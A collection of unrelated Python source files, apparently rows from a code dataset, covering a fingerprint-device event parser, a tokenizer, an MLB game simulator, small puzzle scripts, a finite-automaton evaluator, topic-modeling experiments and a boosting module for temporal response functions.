        if self.last_event_code == DEFS.EF_FPFTR:
            score = self.last_payload_data[0]
        return score

    def wait_for_fingerscore(self):
        """
        Blocks execution until a finger score event is received.

        :return: Integer, the score may be 100 (valid) or 0 (invalid).
        """
        while True:
            self.recv_event()
            if self.last_event_code == DEFS.EF_FPFTR:
                return self.parse_score_fp_event()

    def parse_verify_event(self):
        """
        Extracts the user index from a verify event packet.

        :return: Integer, user internal index on machine; -1 if the packet
            doesn't correspond to an EF_VERIFY event.
        """
        user_sn = -1
        if self.last_event_code == DEFS.EF_VERIFY:
            user_sn = struct.unpack('<I', self.last_payload_data[0:4])[0]
            if self.last_payload_data[4] != 1:
                # BUG FIX: the format string was previously just '%', which
                # raises ValueError ("incomplete format") instead of
                # printing the unexpected byte.
                print('Found value different of 1 on verify packet: %i' %
                      (self.last_payload_data[4]))
        return user_sn
|
998,329 | da8aa8fd1c2978000911c79f3f09635e6c250166 | from consts import *
def read_number(string):
    """Consume a leading numeric literal from *string*.

    Scans characters belonging to the NUMBER set (presumably digits plus
    '.' -- TODO confirm against consts.py) and stops before a second
    decimal point, so "1.2.3" only consumes "1.2".

    Returns (remaining_string, 'NUMBER', consumed_text).
    """
    status = STATUS_NEW  # flips to STATUS_POINT once a '.' has been seen
    ret = 0  # number of characters consumed so far
    for c in string:
        if c not in NUMBER:
            break
        if status == STATUS_NEW:
            if c == '.':
                status = STATUS_POINT
        elif status == STATUS_POINT:
            if c == '.':
                # A second decimal point ends the literal.
                break
        ret += 1
    return string[ret:], 'NUMBER', string[:ret]
def read_word(string):
    """Consume a leading identifier-like word from *string*.

    The word may not *start* with a NUMBER character (digits are allowed
    after the first character). The token type is refined to 'KEYWORD' or
    'TYPE' when the word appears in those sets (TYPE wins if in both).

    Returns (remaining_string, token_type, consumed_text).
    """
    status = STATUS_NEW  # STATUS_NEW only while on the first character
    ret = 0  # number of characters consumed so far
    for c in string:
        if c not in WORD:
            break
        if status == STATUS_NEW:
            if c in NUMBER:
                # Words must not begin with a digit.
                break
            else:
                status = STATUS_POINT
        ret += 1
    word = string[:ret]
    ret_type = 'WORD'
    ret_type = 'KEYWORD' if word in KEYWORD else ret_type
    ret_type = 'TYPE' if word in TYPE else ret_type
    return string[ret:], ret_type, string[:ret]
def read_operator(string):
    """Consume a leading run of OPERATOR characters.

    Returns (remaining_string, 'OPERATOR', consumed_text).
    """
    length = 0
    while length < len(string) and string[length] in OPERATOR:
        length += 1
    return string[length:], 'OPERATOR', string[:length]
def read_punctuator(string):
    """Consume a single leading PUNCTUATOR character, if present.

    Returns (remaining_string, 'PUNCTUATOR', consumed_text) where the
    consumed text is one character or ''.
    """
    # The original kept an unused `status` state variable; a punctuator is
    # always at most one character, so no state machine is needed.
    punctuator = ''
    ret = 0
    if string and string[0] in PUNCTUATOR:
        ret = 1
        punctuator = string[0]
    return string[ret:], 'PUNCTUATOR', punctuator
def read_const(string):
    """Consume a leading double-quoted string constant.

    Small state machine: STATUS_NEW before the opening quote,
    ONE_QUOTATION inside the literal, TWO_QUOTATION after the closing
    quote. An unterminated literal consumes nothing.

    Returns (remaining_string, 'CONST', consumed_text) where the consumed
    text includes both quotes.
    """
    status = STATUS_NEW
    str_const = str()  # NOTE(review): written but never used -- candidate for removal
    ret = 0
    for c in string:
        if status == STATUS_NEW:
            if c == '"':
                status = ONE_QUOTATION
            else:
                # Not a string constant at all.
                break
        elif status == ONE_QUOTATION:
            if c == '"':
                status = TWO_QUOTATION
        ret += 1
        if status == TWO_QUOTATION:
            break
    if status != TWO_QUOTATION:
        # Unterminated literal: consume nothing.
        ret = 0
    return string[ret:], 'CONST', string[:ret]
|
998,330 | b8215a6de290ebb3a81e77f1226bcfed3a4934c3 | import json
import requests
import game as g
class Menu:
    """Console front-end: builds two teams of MLB players from user input
    and hands them to game.Game for simulation."""

    def __init__(self):
        print("***Welcome to MLB Simulator***")
        # Batting line-ups: team1 = home, team2 = away (see startup()).
        self.team1 = []
        self.team2 = []

    def pickPlayer(self):
        """Interactively choose one player and a season.

        Queries the MLB lookup service by (partial) name, then verifies the
        player has stats for the chosen year.

        Returns a dict {"player_id": str, "name": str, "year": str}.

        NOTE(review): the lookup API returns "row" as a single dict when
        totalSize == 1 and as a list otherwise -- both branches below rely
        on that shape.
        """
        while True:
            player = input()
            response = requests.get("http://lookup-service-prod.mlb.com/json/named.search_player_all.bam?sport_code='mlb'&name_part='"+ player +"%'")
            data = response.json()["search_player_all"]["queryResults"]
            length = int(data["totalSize"])
            if length == 0 :
                print("Found no players please try again")
            elif length == 1 :
                # Exactly one hit: "row" is a dict.
                print("You choose " + data["row"]["name_display_first_last"])
                player_id = data["row"]["player_id"]
                break
            else:
                # Several hits: "row" is a list; offer the first five.
                print("Found " + data["totalSize"] + ": The first "+ str(min(5, length)) +" are")
                for x in range(0, min(5, length)):
                    print(str(x + 1) + ": " + data["row"][x]["name_display_first_last"] + ", Born " + data["row"][x]["birth_date"])
                i = input("To pick one of first five enter 1-5 or press enter to continue: ")
                if i.isdigit() and int(i) >= 1 and int(i) <= min(5, length) :
                    player_id = data["row"][int(i) - 1]["player_id"]
                    break
        # NOTE(review): printed only after a player is already chosen --
        # placement looks off; confirm whether it was meant before the loop.
        print("Pick a player")
        while True:
            year = input("Pick a year for player stats: ")
            response = requests.get("https://statsapi.mlb.com/api/v1/people/"+player_id +"/stats?stats=statsSingleSeason&gameType=R&season="+ year)
            length = len(response.json()["stats"])
            if(length == 0):
                print("Player did not play in " + year)
            else:
                break
        return {"player_id": player_id, "name" : player,"year": year}

    def startup(self):
        """Build both 9-man line-ups plus pitchers, then run the game loop."""
        print("Press Enter to Pick Home Team:")
        input()
        for i in range(0,9) :
            print("Pick Next Batter")
            self.team1.append(self.pickPlayer())
        print("Pick Home Team Pitcher")
        pitcher1 = self.pickPlayer()
        print("Press Enter to Pick Away Team:")
        input()
        for i in range(0,9) :
            print("Pick Next Batter")
            self.team2.append(self.pickPlayer())
        print("Pick Away Team Pither")
        pitcher2 = self.pickPlayer()
        game = g.Game(self.team1, self.team2, [pitcher1], [pitcher2])
        print("Press Enter to Play:")
        input()
        response = 'r'
        game.play()
        # Post-game menu: replay, new game, or quit.
        while True:
            print("[r] to replay game")
            print("[p] to start new game")
            print("[q] to quit simulator")
            response = input()
            if response == "r":
                game.replay()
            elif response == "p" or response == "q":
                break
        # NOTE(review): recursing into startup() re-uses the already-filled
        # team lists, so a second game would append 9 more players to each.
        if response == 'p':
            self.startup()
|
# Checksum over ids in in.txt: (number of lines containing some character
# exactly twice) * (number of lines containing some character exactly
# three times).
# FIX: the input file is now opened with a context manager; the original
# bare open() leaked the file handle.
with open('in.txt') as infile:
    lines = [line.rstrip('\n') for line in infile]

num2 = 0
num3 = 0
for word in lines:
    # Character -> occurrence count for this line.
    counts = {}
    for ch in word:
        counts[ch] = counts.get(ch, 0) + 1
    occurrences = counts.values()
    if 2 in occurrences:
        num2 += 1
    if 3 in occurrences:
        num3 += 1

print(num2*num3)
|
998,332 | e323127a49204b61cab0caf64ae47acf192ec0e5 | # This code was converted to Python3 from the Python2 code from the Youtube channel "Numberphile".
# the two videos: https://youtu.be/Wim9WJeDTHQ & https://youtu.be/E4mrC39sEOQ
def per(n, steps = 0):
    """Print the chain of digit products of ``n`` down to a single digit.

    Each intermediate product is printed, then the final digit and the total
    step count (the multiplicative persistence of ``n``). Returns 'DONE'.
    """
    if len(str(n)) == 1:
        # Base case: a single digit has been reached.
        print(n)
        print('Total Steps ' + str(steps))
        return 'DONE'
    steps += 1
    digits = [int(i) for i in str(n)]
    result = 1
    for j in digits:
        result *= j
    if len(str(n)) != 1:
        print(result)
    # BUG FIX: return the recursive call's result so the caller receives
    # 'DONE' (previously the value was discarded, so any multi-digit input
    # made per() return None).
    return per(result, steps)
|
998,333 | 1efa379e153b44edfa25b4fe8a783b0593f2b6cb | from Auxiliary.Loader import Loader_IEMOCAP_Both
from Model.BLSTMwMultiAttention import BLSTMwMultiAttention
from Auxiliary.TrainTemplate import Template_FluctuateSize_BothFeatures
if __name__ == '__main__':
    # Train/evaluate BLSTM models with paired attention mechanisms on
    # IEMOCAP, sweeping the attention type, speaker gender and session
    # number (sessions 1-5).
    cudaFlag = True
    metaFlag, multiFlag = False, True
    for attentionName in ['StandardAttention', 'LocalAttention', 'ComponentAttention', 'MonotonicAttention']:
        for appointGender in ['Female', 'Male']:
            for appointSession in range(1, 6):
                # featuresNumber switches between 120 and 40 depending on
                # multiFlag (the loader is given the same flag below).
                Model = BLSTMwMultiAttention(
                    attentionName=[attentionName, attentionName], attentionScope=[10, 10],
                    attentionParameter=['LeftAttention', 'RightAttention'], featuresNumber=120 if multiFlag else 40,
                    cudaFlag=cudaFlag)
                # Result directory encodes the flag/attention/gender/session combination.
                savePath = 'D:/PythonProjects_Data/IEMOCAP_Result_Test/BLSTMwBothAttention%s%s/%s/%s-%d' % (
                    '_Meta' if metaFlag else '', '_Multi' if multiFlag else '', attentionName, appointGender,
                    appointSession)
                trainDataset, testDataset = Loader_IEMOCAP_Both(
                    appointGender=appointGender, appointSession=appointSession, batchSize=32, metaFlag=metaFlag,
                    multiFlag=multiFlag)
                Template_FluctuateSize_BothFeatures(Model=Model, trainDataset=trainDataset, testDataset=testDataset,
                                                    cudaFlag=cudaFlag, savePath=savePath)
|
998,334 | db49392f1fb290d6cce43e2a4e582f9fdc4ba489 | import math
import cmath
import sys
import string
import heapq
import bisect
from queue import Queue,PriorityQueue,LifoQueue
from collections import Counter,deque
from itertools import permutations,combinations
from functools import cmp_to_key
def power(base,exponent):
    """Fast exponentiation by squaring: return base ** exponent.

    Walks the exponent bit by bit; whenever the current low bit is set,
    the running square is folded into the result.
    """
    result = 1
    square = base
    exp = exponent
    while exp:
        if exp & 1:
            result *= square
        square *= square
        exp >>= 1
    return result
# BUG FIX: the original bare `power()` call raised TypeError at import time
# (both base and exponent are required). Exercise the function with sample
# values instead.
print(power(2, 10))
import math
import cmath
import sys
import string
import heapq
import bisect
import copy
from queue import Queue, PriorityQueue, LifoQueue
from collections import Counter, deque
from itertools import permutations, combinations
from functools import cmp_to_key, reduce
# def quick(base, exp):
# res = 1
# while exp:
# if exp & 1:
# res = (res * base)%100003
# base = (base * base)%100003
# exp = exp >> 1
# return res
#
#
# if __name__ == "__main__":
# m, n = list(map(int, input().strip().split()))
# # print(gcd(15,6))
# h = quick(m, n)
# k = quick(m - 1, n - 1)
# print((h % 100003 - (m * k) % 100003 + 100003) % 100003) |
998,335 | 3a325af0b090e0c410fc90a8975c0f7624fba8ed | from cinema.models import Film, Genre
from service.objects import CachedObject
from service.vectorizers import *
import service.filmsfilter as flt
from sklearn.feature_extraction import DictVectorizer
import re
# NOTE: this is a Python 2 script (bare `print` statements and raw_input
# appear further down in the file).
filtered_films = flt.filter1()
# indexes maps a film's imdb_id to its row index in the keyword matrix.
indexes = hashIndexes(filtered_films.iterator())
cDict = CachedObject('keywords')
# Recompute the keyword sparse matrix only when the cached checksum no
# longer matches the current film set.
if cDict.checksum != str(hash(''.join(indexes.keys()))):
    print("Computing the keywords sparse matrix ...")
    gkey = genKeywords(filtered_films.iterator())
    indexes = hashIndexes(filtered_films.iterator())
    v = DictVectorizer(dtype=int)
    # X0: films x keywords occurrence-count sparse matrix.
    X0 = v.fit_transform(gkey)
    feature_names = v.get_feature_names()
    cDict.set_content((feature_names, X0))
    cDict.checksum = str(hash(''.join(indexes.keys())))
    cDict.save()
else:
    feature_names, X0 = cDict.get_content()

# Aggregate keyword counts per genre.
filmsbygenre = {}
keywordsbygenre = {}
for genre in Genre.objects.all():
    # Row indices of the films tagged with this genre (Python 2 map()
    # returns a list, so the `== []` test below works).
    filmsbygenre[genre.name] = map(lambda e : indexes[e], map(lambda e: e.imdb_id, filtered_films.filter(genres = genre)))
    if filmsbygenre[genre.name] == []:
        keywordsbygenre[genre.name] = np.zeros(X0.shape[1])
    else:
        keywordsbygenre[genre.name] = np.sum(X0[filmsbygenre[genre.name]].toarray(), axis=0)

# Exploratory peeks (results intentionally discarded).
rex = re.compile('male')
[m for m in feature_names if rex.search(m)]
np.array(feature_names)[np.argsort(-keywordsbygenre['Action'])]

# TF-IDF-weight the raw keyword counts before topic extraction.
from sklearn.feature_extraction.text import TfidfTransformer
X = TfidfTransformer().fit_transform(X0)
k = 40 # wanted number of topics
### SVD DECOMPOSITION (LSA) ##
### USING GENSIM #############
ans = raw_input("Start Latent Semantic Analysis with Gensim ? ")
if ans != "y":
exit()
from gensim.models.lsimodel import LsiModel
from gensim.matutils import Sparse2Corpus, corpus2dense
co = Sparse2Corpus(X, documents_columns = False)
lsi = LsiModel(corpus=co, num_topics=k)
list_topics = lsi.show_topics(formatted=False)
topics = map(lambda li : [(value, feature_names[int(key)]) for (value, key) in li] ,list_topics)
print(topics)
genreMat = []
for genre in Genre.objects.all():
index = filmsbygenre[genre.name]
if index != []:
obj = lsi[Sparse2Corpus(X[index, :], documents_columns = False)]
E = corpus2dense(obj, k).transpose()
genreMat.append( np.hstack([ [genre.name] , np.mean(E, axis = 0)]) )
else:
genreMat.append( np.hstack([ [genre.name] , np.zeros(k) ] ))
genreMat = np.vstack(genreMat)
print genreMat
### USING SCIKIT-LEARN #######
ans = raw_input("Start Latent Semantic Analysis with Scikit-Learn ? ")
if ans != "y":
exit()
from sklearn.decomposition import TruncatedSVD
svd = TruncatedSVD(n_components = k, n_iterations = 100)
y = svd.fit_transform(X)
topics2 = [[(svd.components_[l][i], feature_names[i]) for i in np.argsort(-np.abs(svd.components_[l]))[:10]] for l in range(k)]
print topics2
genreMat2 = []
for genre in Genre.objects.all():
index = filmsbygenre[genre.name]
if index != []:
E = y[index, :]
genreMat2.append( np.hstack([ [genre.name] , np.mean(E, axis = 0)]) )
else:
genreMat2.append( np.hstack([ [genre.name] , np.zeros(k) ] ))
genreMat2 = np.vstack(genreMat2)
print genreMat2
index = filmsbygenre['Action']
E = y[index, :]
### PCA ######################
ans = raw_input("Start PCA with Scikit ? ")
if ans != "y":
exit()
from sklearn.decomposition import PCA
pca = PCA(n_components = k, whiten=True)
y = pca.fit_transform(X.todense())
topics3 = [[(pca.components_[l][i], feature_names[i]) for i in np.argsort(-np.abs(pca.components_[l]))[:10]] for l in range(k)]
print topics3
genreMat3 = []
for genre in Genre.objects.all():
index = filmsbygenre[genre.name]
if index != []:
E = y[index, :]
genreMat3.append( np.hstack([ [genre.name] , np.mean(E, axis = 0)]) )
else:
genreMat3.append( np.hstack([ [genre.name] , np.zeros(k) ] ))
genreMat3 = np.vstack(genreMat3)
print genreMat3
index = filmsbygenre['Action']
E = y[index, :]
### FASTICA ###################
ans = raw_input("Start FastICA with Scikit ? ")
if ans != "y":
exit()
from sklearn.decomposition import FastICA
ica = FastICA(n_components = k, whiten=True)
y = ica.fit_transform(X.todense())
topics4 = [[(ica.components_[l][i], feature_names[i]) for i in np.argsort(-np.abs(ica.components_[l]))[:10]] for l in range(k)]
print topics4
genreMat4 = []
for genre in Genre.objects.all():
index = filmsbygenre[genre.name]
if index != []:
E = y[index, :]
genreMat4.append( np.hstack([ [genre.name] , np.mean(E, axis = 0)]) )
else:
genreMat4.append( np.hstack([ [genre.name] , np.zeros(k) ] ))
genreMat4 = np.vstack(genreMat4)
print genreMat4
index = filmsbygenre['Action']
E = y[index, :]
### K-Means ###################
ans = raw_input("Start K-Means with Scikit ? ")
if ans != "y":
exit()
from sklearn.cluster import MiniBatchKMeans, KMeans
km = MiniBatchKMeans(n_clusters=k, init='k-means++', n_init=1, init_size=1000, batch_size=1000, verbose=1)
km2 = KMeans(n_clusters = k, init='k-means++', verbose=1)
y2 = km2.fit_transform(X)
topics5 = [[(km.cluster_centers_[l][i], feature_names[i]) for i in np.argsort(-np.abs(km.cluster_centers_[l]))[:10]] for l in range(k)]
print topics5
### NMF #######################
ans = raw_input("Start NMF with Scikit ? ")
if ans != "y":
exit()
from sklearn.decomposition import ProjectedGradientNMF
# BEWARE : THIS IS COMPUTATIONNALY INTENSIVE
nmf = ProjectedGradientNMF(n_components=k, max_iter = 10, nls_max_iter=100)
nmf.fit(X)
topics6 = [[(nmf.components_[l][i], feature_names[i]) for i in np.argsort(-np.abs(nmf.components_[l]))[:10]] for l in range(k)] |
998,336 | 198e641843b8fb2933cd4ba5189b86b6e112644f | import re
import xlrd
class Automaton:
    """Finite automaton loaded from an Excel workbook via xlrd.

    Sheet 0 holds metadata (initial/final state ids at cells (1,1) and
    (2,1)); sheet 1 holds the transition table with state ids along index 0.
    """

    # Set to True during reading whenever an 'E' (epsilon) cell is seen.
    # NOTE(review): this is a *class* attribute shared by every Automaton.
    ndfa = False

    def __init__(self, automaton_name, states=None, edges=None):
        self.automaton_name = automaton_name
        # Fresh lists per instance; None defaults avoid shared mutables.
        if states is None :
            self.states = []
        else:
            self.states = states
        if edges is None :
            self.edges = []
        else:
            self.edges = edges

    @classmethod
    def read_from_xls(cls, automaton_file):
        """Build an automaton from an xlrd workbook.

        Returns an NDFA when any 'E' cell was encountered, else a DFA.
        """
        information_sheet = automaton_file.sheet_by_index(0)
        automaton_sheet = automaton_file.sheet_by_index(1)
        automaton_initial_state_id = information_sheet.cell_value(1,1)
        automaton_final_state_id = information_sheet.cell_value(2,1)
        # NOTE(review): these default to the State *class* object, not an
        # instance; they are expected to be overwritten in the loop below.
        automaton_initial_state = State
        automaton_final_state = State
        automaton_states = []
        # NOTE(review): the loop bounds use ncols for the first cell index
        # and nrows for the second -- confirm the sheet is laid out
        # transposed relative to xlrd's (row, col) convention.
        for i in range(1,automaton_sheet.ncols):
            automaton_edges = []
            is_initial = False
            is_final = False
            for b in range(1,automaton_sheet.nrows):
                # NOTE(review): the second half of this condition can never
                # fail when the first half holds ('E' != 'x' is always True).
                if automaton_sheet.cell_value(i,b) == 'E' and automaton_sheet.cell_value(i,b) != 'x':
                    Automaton.ndfa = True
                    edge_accepted_values = automaton_sheet.cell_value(i,b)
                    initial_state = automaton_sheet.cell_value(i,0)
                    final_state = automaton_sheet.cell_value(0,b)
                    automaton_edges.append(Edge(initial_state,final_state,edge_accepted_values))
                elif automaton_sheet.cell_value(i,b) != 'x':
                    # A comma-separated cell lists the symbols accepted on
                    # the edge from state (index i) to state (index b);
                    # 'x' marks "no transition".
                    edge_accepted_values = re.split(',',automaton_sheet.cell_value(i,b))
                    initial_state = automaton_sheet.cell_value(i,0)
                    final_state = automaton_sheet.cell_value(0,b)
                    automaton_edges.append(Edge(initial_state,final_state,edge_accepted_values))
            if automaton_sheet.cell_value(i,0) == automaton_initial_state_id:
                is_initial = True
                state = State(automaton_sheet.cell_value(i,0),is_initial,is_final,automaton_edges)
                automaton_states.append(state)
                automaton_initial_state = state
            elif automaton_sheet.cell_value(i,0) == automaton_final_state_id:
                is_final = True
                state = State(automaton_sheet.cell_value(i,0),is_initial,is_final,automaton_edges)
                automaton_states.append(state)
                automaton_final_state = state
            else:
                automaton_states.append(State(automaton_sheet.cell_value(i,0),is_initial,is_final,automaton_edges))
        if Automaton.ndfa:
            return NDFA("AutomatonNDFA",automaton_initial_state,automaton_final_state,automaton_states)
        else:
            return DFA("AutomatonDFA",automaton_initial_state,automaton_final_state,automaton_states)
class State:
    """A single automaton state together with its outgoing edges."""

    def __init__(self, state_id, is_initial, is_final, edges=None):
        self.state_id = state_id
        self.is_initial = is_initial
        self.is_final = is_final
        # Materialise a fresh list to avoid a shared mutable default.
        self.edges = [] if edges is None else edges
class Edge:
    """Directed transition between two state ids plus its accepted symbols."""

    def __init__(self, initial_state, final_state, edge_accepted_values=None):
        self.initial_state = initial_state
        self.final_state = final_state
        # Materialise a fresh list to avoid a shared mutable default.
        self.edge_accepted_values = [] if edge_accepted_values is None else edge_accepted_values
class DFA(Automaton):
    """Deterministic automaton; evaluates an input string recursively."""

    def __init__(self, automaton,initial_state, final_state, states=None):
        super().__init__(automaton)
        self.initial_state = initial_state
        self.final_state = final_state
        if states is None:
            self.states = []
        else:
            self.states = states

    def evaluate_expresion_by_automaton(self, expresion_str,actual_state):
        """Return True when the remaining input can end in a final state.

        Consumes one accepted character per recursion step and follows the
        matching edge. NOTE(review): when no edge matches any remaining
        character the loops fall through and the method implicitly returns
        None (falsy) rather than False -- confirm that is intended.
        """
        if expresion_str != "":
            expresion_arr = list(expresion_str)
            for x in range(0,len(actual_state.edges)):
                for z in range(0, len(expresion_arr)):
                    if any(expresion_arr[z] in s for s in actual_state.edges[x].edge_accepted_values):
                        if expresion_str != "":
                            # NOTE(review): list.remove() deletes the first
                            # occurrence of the *value* at index x (an edge
                            # index used on the character list) rather than
                            # the matched character at index z -- this looks
                            # like a bug; confirm before changing.
                            expresion_arr.remove(expresion_arr[x])
                            expresion_str = ''.join(expresion_arr)
                            actual_state = next((a for a in self.states if a.state_id == actual_state.edges[x].final_state), None)
                            return self.evaluate_expresion_by_automaton(expresion_str, actual_state)
                        elif actual_state.is_final and expresion_str == "" :
                            return True
                        else:
                            return False
        elif actual_state.is_final:
            return True
        else:
            return False
class NDFA(Automaton):
    """Non-deterministic automaton.

    NOTE(review): the evaluator below is byte-for-byte identical to
    DFA.evaluate_expresion_by_automaton -- epsilon ('E') transitions are
    not actually handled; consider sharing one implementation on the base
    class instead of duplicating it.
    """

    def __init__(self, automaton,initial_state, final_state, states=None):
        super().__init__(automaton)
        self.initial_state = initial_state
        self.final_state = final_state
        if states is None:
            self.states = []
        else:
            self.states = states

    def evaluate_expresion_by_automaton(self, expresion_str,actual_state):
        """Return True when the remaining input can end in a final state.

        See the DFA notes: no-match paths fall through and return None, and
        the remove()-by-edge-index line looks buggy; flagged, not changed.
        """
        if expresion_str != "":
            expresion_arr = list(expresion_str)
            for x in range(0,len(actual_state.edges)):
                for z in range(0, len(expresion_arr)):
                    if any(expresion_arr[z] in s for s in actual_state.edges[x].edge_accepted_values):
                        if expresion_str != "":
                            expresion_arr.remove(expresion_arr[x])
                            expresion_str = ''.join(expresion_arr)
                            actual_state = next((a for a in self.states if a.state_id == actual_state.edges[x].final_state), None)
                            return self.evaluate_expresion_by_automaton(expresion_str, actual_state)
                        elif actual_state.is_final and expresion_str == "" :
                            return True
                        else:
                            return False
        elif actual_state.is_final:
            return True
        else:
            return False
# Interactive driver: load an automaton from Automaton.xlsx and evaluate
# expressions against it until the user types "exit".
automaton_file = xlrd.open_workbook("Automaton.xlsx")
sheet = automaton_file.sheet_by_index(0)
action = int(sheet.cell_value(0,1))
run_program = True
while run_program:
    if action == 1:
        obj_automaton = Automaton.read_from_xls(automaton_file)
        # idiom fix: identity comparison for None
        if obj_automaton is None:
            print("Syntax error, check the automaton")
        else:
            expresion_str = input("write an expresion and press enter to evaluate in automaton: ")
            if expresion_str == "exit":
                run_program = False
            else:
                # BUG FIX: previously the expression was evaluated and printed
                # even after the user typed "exit"
                print(obj_automaton.evaluate_expresion_by_automaton(expresion_str,obj_automaton.initial_state))
    elif action == 2:
        # NOTE(review): ``automaton_arr`` is not defined anywhere in this
        # part of the file — presumably created earlier; confirm before
        # relying on this branch
        automaton_arr.pop(0)
        obj_automaton = Automaton.read_from_str(automaton_arr)
|
998,337 | b3b99dcbcd9774fe49919157f85e6bb9e13a24c8 | #Alaska Miller
#6/23/2020
#The Perpouse of this program is to promt the human end user anwser a series of questions and then check the anwnsers of those questions against a previously recorded list of responses and checks the inputed responses against those, if they match then the user is told they may join a club, if not they are denied membership:
def main():
    """Run the coding-club membership questionnaire on stdin/stdout.

    Asks for consent, records three y/n answers, and compares answers 2 and 3
    against the recorded answer key to accept or reject the applicant.
    """
    # blank response list and the recorded answer key; index 0 is statistical
    # only and is never checked (hence the "N/A" placeholder)
    inputList = []
    ansList = ["N/A","y","y"]
    # prompt the user to begin the application, or thank them for their time
    promtYn = input("Do you want to join a coding club? (y/n):")
    if promtYn == "y":
        areYouSure = input("Great, but first we need to ask you some questions, is this okay with you? (y/n):")
        # BUG FIX: this previously re-tested ``promtYn``, so the consent
        # answer was silently ignored
        if areYouSure == "y":
            questionOne = input("Okay good! So our first question is, do you know any sort of programing langauge (y/n):")
            if questionOne == "y":
                print("Okay good! So our first question is, do you know any sort of programing langauge (y/n): "+str(questionOne))
            if questionOne == "n":
                print(" ")
                print("Okay good! So our first question is, do you know any sort of programing langauge (y/n): "+str(questionOne))
            # record the answer verbatim; previously nothing was appended for
            # inputs other than y/n, which crashed the checks below with an
            # IndexError
            inputList.append(questionOne)
            questionTwo = input("Now for question 2, are you willing to contribute to a safe and postive enviroment for our club? (y/n): ")
            if questionTwo == "y" or questionTwo == "n":
                print(" ")
                print("Now for question 2, are you willing to contribute to a safe and postive enviroment for our club? (y/n): "+str(questionTwo))
            inputList.append(questionTwo)
            questionThree = input("Okay third and final question, are you willing to learn new things over the course of being in this club? (y/n): ")
            if questionThree == "y" or questionThree == "n":
                print(" ")
                print("Okay third and final question, are you willing to learn new things over the course of being in this club? (y/n): "+str(questionThree))
            inputList.append(questionThree)
            # accept only when both required answers match the answer key
            if inputList[1] == ansList[1] and inputList[2] == ansList[2]:
                print(" ")
                print("Congradulations! You can join the coding club!!!")
                if inputList[0] == "y":
                    print(" ")
                    print("We are glad to have someone who is allready exprienced in the club!")
                print(" ")
                print("We are also glad that you are willing to work with others and learn from others as well!")
            # BUG FIX: rejection previously required BOTH answers to be wrong
            # ('and'), so a single wrong answer produced no output at all
            if inputList[1] != ansList[1] or inputList[2] != ansList[2]:
                print("We are sorry but we don't think you are the kind of person we are looking for in our club, we are truely sorry, please contact the club administrator if you belive this to be a mistake!")
        # BUG FIX: was ``promtYn == "n"``, which is unreachable inside the
        # ``promtYn == "y"`` branch
        if areYouSure == "n":
            print("Sorry but these questions are required to gain club membership")
    if promtYn == "n":
        print("Okay thank you for your time")
# Runs the questionnaire on import as well as direct execution.
# NOTE(review): consider guarding with ``if __name__ == "__main__":``.
main()
|
998,338 | dc4b0a630843073d1cf548b0a5e9e411d500f733 | """
Boosting as described by David et al. (2007).
Profiling
---------
ds = datasets._get_continuous()
y = ds['y']
x1 = ds['x1']
x2 = ds['x2']
%prun -s cumulative res = boosting(y, x1, 0, 1)
"""
from inspect import getargspec
from itertools import chain, product
from math import floor
from multiprocessing import Process, Queue, cpu_count
from multiprocessing.sharedctypes import RawArray
import time
from threading import Thread
import numpy as np
from numpy import newaxis
from scipy.stats import spearmanr
from tqdm import tqdm
from .. import _colorspaces as cs
from .._data_obj import NDVar, UTS, dataobj_repr
from .._stats.error_functions import (l1, l2, l1_for_delta, l2_for_delta,
update_error)
from .._utils import LazyProperty
# BoostingResult version
VERSION = 6
# cross-validation
N_SEGS = 10
# multiprocessing (0 = single process)
N_WORKERS = cpu_count()
JOB_TERMINATE = -1
# error functions
ERROR_FUNC = {'l2': l2, 'l1': l1}
DELTA_ERROR_FUNC = {'l2': l2_for_delta, 'l1': l1_for_delta}
class BoostingResult(object):
    """Result from boosting a temporal response function

    Attributes
    ----------
    h : NDVar | tuple of NDVar
        The temporal response function. Whether ``h`` is an NDVar or a tuple of
        NDVars depends on whether the ``x`` parameter to :func:`boosting` was
        an NDVar or a sequence of NDVars.
    h_scaled : NDVar | tuple of NDVar
        ``h`` scaled such that it applies to the original input ``y`` and ``x``.
        If boosting was done with ``scale_data=False``, ``h_scaled`` is the same
        as ``h``.
    r : float | NDVar
        Correlation between the measured response and the response predicted
        with ``h``. Type depends on the ``y`` parameter to :func:`boosting`.
    spearmanr : float | NDVar
        As ``r``, the Spearman rank correlation.
    t_run : float
        Time it took to run the boosting algorithm (in seconds).
    error : str
        The error evaluation method used.
    fit_error : float | NDVar
        The fit error, i.e. the result of the ``error`` error function on the
        final fit.
    delta : scalar
        Kernel modification step used.
    mindelta : None | scalar
        Mindelta parameter used.
    scale_data : bool
        Scale_data parameter used.
    y_mean : NDVar | scalar
        Mean that was subtracted from ``y``.
    y_scale : NDVar | scalar
        Scale by which ``y`` was divided.
    x_mean : NDVar | scalar | tuple
        Mean that was subtracted from ``x``.
    x_scale : NDVar | scalar | tuple
        Scale by which ``x`` was divided.
    """
    def __init__(self, h, r, isnan, t_run, version, delta, mindelta, error,
                 spearmanr, fit_error, scale_data, y_mean, y_scale, x_mean,
                 x_scale, y=None, x=None, tstart=None, tstop=None):
        self.h = h
        self.r = r
        self.isnan = isnan
        self.t_run = t_run
        self.version = version
        self.delta = delta
        self.mindelta = mindelta
        self.error = error
        self.spearmanr = spearmanr
        self.fit_error = fit_error
        self.scale_data = scale_data
        self.y_mean = y_mean
        self.y_scale = y_scale
        self.x_mean = x_mean
        self.x_scale = x_scale
        self.y = y
        self.x = x
        self.tstart = tstart
        self.tstop = tstop

    def __getstate__(self):
        # Pickle exactly the __init__ arguments so __setstate__ can re-call it.
        # BUG FIX: inspect.getargspec() was deprecated and removed in
        # Python 3.11; getfullargspec() is a drop-in replacement for this
        # plain positional signature (same ``.args`` attribute).
        from inspect import getfullargspec
        return {attr: getattr(self, attr) for attr in
                getfullargspec(self.__init__).args[1:]}

    def __setstate__(self, state):
        self.__init__(**state)

    def __repr__(self):
        if self.x is None or isinstance(self.x, str):
            x = self.x
        else:
            x = ' + '.join(map(str, self.x))
        items = ['boosting %s ~ %s' % (self.y, x),
                 '%g - %g' % (self.tstart, self.tstop)]
        # show only boosting() keyword arguments that differ from the defaults
        # (getfullargspec replaces the removed getargspec, see __getstate__)
        from inspect import getfullargspec
        argspec = getfullargspec(boosting)
        names = argspec.args[-len(argspec.defaults):]
        for name, default in zip(names, argspec.defaults):
            value = getattr(self, name)
            if value != default:
                items.append('%s=%r' % (name, value))
        return '<%s>' % ', '.join(items)

    @LazyProperty
    def h_scaled(self):
        # undo the y/x normalization so h applies to the caller's raw data
        if self.y_scale is None:
            return self.h
        elif isinstance(self.h, NDVar):
            return self.h * (self.y_scale / self.x_scale)
